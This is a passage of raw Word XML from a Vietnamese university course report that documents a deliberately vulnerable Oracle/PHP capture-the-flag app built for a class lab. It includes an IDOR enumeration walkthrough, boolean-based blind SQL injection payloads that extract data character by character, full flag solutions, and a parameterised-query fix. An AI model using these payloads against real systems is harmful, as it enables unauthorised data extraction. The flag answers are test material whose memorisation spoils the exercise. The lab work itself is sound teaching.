        <w:t xml:space="preserve">// SECURE – bind variable, không concatenate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$param = '%' . $keyword . '%';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$sql  = "SELECT ... WHERE full_name LIKE :kw ...";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$stmt = oci_parse($conn, $sql);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">oci_bind_by_name($stmt, ':kw', $param);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">oci_execute($stmt);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Vulnerability 2 – IDOR + Broken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2013"/>
        <w:gridCol w:w="1000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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lỗ hổng (DBS401)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3013"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4A261" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2013"/>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tìm flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">📍 Vị trí: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">transcript.php (?ref=) và audit.php (?log_id=)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint xem transcript không kiểm tra quyền sở hữu (ownership). transcript_ref có pattern dự đoán được (TXN-{id:03d}-{year}-S{sem}). Bất kỳ user đăng nhập đều truy cập transcript của sinh viên ẩn không xuất hiện trong danh sách.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Bước 1: Quan sát pattern từ dashboard → TXN-001-2024-S1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Bước 2: Enumerate → TXN-099-2024-S1 (hidden student)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /transcript.php?ref=TXN-099-2024-S1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">→ internal_note: CLASSIFIED_DATA: REJTNDAxezFET1JfVHI0bnNf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">→ base64_decode → DBS401{1DOR_Tr4ns_   (Part A)</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Bước 3: Theo admin_ref_id → audit.php?log_id=N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">→ metadata_note: {"fragment_b":"}!w4lF_ss3cc4","decode_hint":"reverse_this_part"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">→ reverse → 4cc3ss_Fl4w!}   (Part B)</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FLAG 2 = DBS401{1DOR_Tr4ns_ + 4cc3ss_Fl4w!} = DBS401{1DOR_Tr4ns_4cc3ss_Fl4w!}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Vulnerability 3 – Oracle Boolean-Based Blind SQL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2013"/>
        <w:gridCol w:w="1000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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lỗ hổng (DBS401)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3013"/>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HARD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2013"/>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Mức độ tìm flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">📍 Vị trí: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">secret_check.php – tham số ?key=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint chỉ trả về hai trạng thái (found/not_found), không trả dữ liệu trực tiếp. Kẻ tấn công phải dùng boolean condition để extract từng ký tự một (Oracle SUBSTR + ASCII). Sau khi lấy được Part A từ ADMIN_SECRETS, cần kết hợp Part B (hex encoded) từ CONFIG_STORE để ghép flag hoàn chỉnh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="023E8A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload boolean-based Oracle:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Xác nhận injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?key=oracle_flag_3_primary' AND '1'='1   → found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?key=oracle_flag_3_primary' AND '1'='2   → not_found</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Xác định LENGTH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?key=oracle_flag_3_primary' AND LENGTH(encrypted_value)=18 AND '1'='1   → found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// Extract từng ký tự</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">?key=oracle_flag_3_primary' AND ASCII(SUBSTR(encrypted_value,1,1))=68 AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   → found → char[1] = 'D' (ASCII 68)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. BẢNG ĐỘ KHÓ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13"/>
        <w:gridCol w:w="2213"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Lỗ hổng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Loại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2413"/>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Mức độ lỗ hổng (DBS401)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2213"/>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Mức độ tìm flag</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bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 1</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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2413"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D6A4F"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Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2213"/>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r>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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IDOR + Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2413"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4A261" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2213"/>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bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 3</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Blind SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2413"/>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Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2213"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D62828" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Very Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="023E8A" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="EFF6FF" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1E40AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghi chú: Nhóm tuân thủ khuyến nghị Easy – Medium – Hard cho mức độ phân loại lỗ hổng theo yêu cầu DBS401. Tuy nhiên, cả 3 flag đều được thiết kế ở mức Very Hard nhằm tăng tính CTF. Người kiểm thử phải kết hợp: recon, phân tích request/response, truy vấn Oracle metadata, loại bỏ fake flags, decode (hex/base64/reverse) và ghép nhiều mảnh flag từ nhiều bảng khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E85D04"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. HƯỚNG DẪN TRIỂN KHAI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web application chạy local theo yêu cầu của môn học:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Local (máy host):     http://127.0.0.1/dbs401-oracle-app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">LAN (nhóm khác test): http://&lt;IP-LAN&gt;/dbs401-oracle-app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Các bước chính: (1) Cài Apache2 + PHP 8.1, (2) Cài Oracle XE 21c/23c Free, (3) Cài Oracle Instant Client + OCI8, (4) Tạo Oracle user dbs401_user, (5) Import schema.sql và seed.sql, (6) Chạy setup.sh để deploy source code, (7) Chạy init_passwords.php để tạo bcrypt hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
